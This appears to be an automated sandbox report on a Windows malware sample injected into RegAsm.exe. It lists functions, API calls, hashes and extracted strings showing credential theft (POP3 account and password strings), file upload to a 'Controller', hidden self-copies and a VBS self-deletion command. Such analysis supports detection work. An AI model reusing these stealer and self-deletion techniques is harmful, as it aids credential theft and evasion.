                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                  • API String ID: 1646373207-255920310
                                                                                                                                  • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                  • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                  • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                  • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                  Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strlen
                                                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                  • API String ID: 4218353326-3023110444
                                                                                                                                  • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                  • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                  • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                  • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                  Function 0040CE34 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 203fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,8)3,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                  • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                  • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                  • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                  • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                  • String ID: 6$8)3$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                  • API String ID: 1579085052-1375072388
                                                                                                                                  • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                  • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                  • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                  • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                  Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                  • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                  • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                  • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                  • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                  • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                  • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                  • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                  • String ID: ?
                                                                                                                                  • API String ID: 3941738427-1684325040
                                                                                                                                  • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                  • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                  • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                  • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                  Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _strlen
                                                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                  • API String ID: 4218353326-230879103
                                                                                                                                  • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                  • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                  • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                  • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                  Function 0044F4AD Relevance: 24.4, APIs: 16, Instructions: 419COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$EnvironmentVariable
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1464849758-0
                                                                                                                                  • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                  • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                  Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseEnumOpen
                                                                                                                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                  • API String ID: 1332880857-3714951968
                                                                                                                                  • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                  • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                  Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                  • String ID: Close
                                                                                                                                  • API String ID: 1657328048-3535843008
                                                                                                                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                  Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$Info
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2509303402-0
                                                                                                                                  • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                  • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                  Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                  • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                  • API String ID: 3086580692-2582957567
                                                                                                                                  • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                                                                                                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                  • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                                                                                                                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                                                                                                  Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                                                                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                                                                                                  • _free.LIBCMT ref: 0045137F
                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                  • _free.LIBCMT ref: 004513A1
                                                                                                                                  • _free.LIBCMT ref: 004513B6
                                                                                                                                  • _free.LIBCMT ref: 004513C1
                                                                                                                                  • _free.LIBCMT ref: 004513E3
                                                                                                                                  • _free.LIBCMT ref: 004513F6
                                                                                                                                  • _free.LIBCMT ref: 00451404
                                                                                                                                  • _free.LIBCMT ref: 0045140F
                                                                                                                                  • _free.LIBCMT ref: 00451447
                                                                                                                                  • _free.LIBCMT ref: 0045144E
                                                                                                                                  • _free.LIBCMT ref: 0045146B
                                                                                                                                  • _free.LIBCMT ref: 00451483
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                                                                                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                                                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                                                                                                  Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                  Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                    • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                                                                                                                                    • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                                                                                                                                    • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                                                  • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$P2$Temp$exepath$open
                                                                                                                                  • API String ID: 1913171305-73741400
                                                                                                                                  • Opcode ID: 237310afed99a6f7d2712caae76b76d9529047829bdbd8efc094c6019fa0fb21
                                                                                                                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
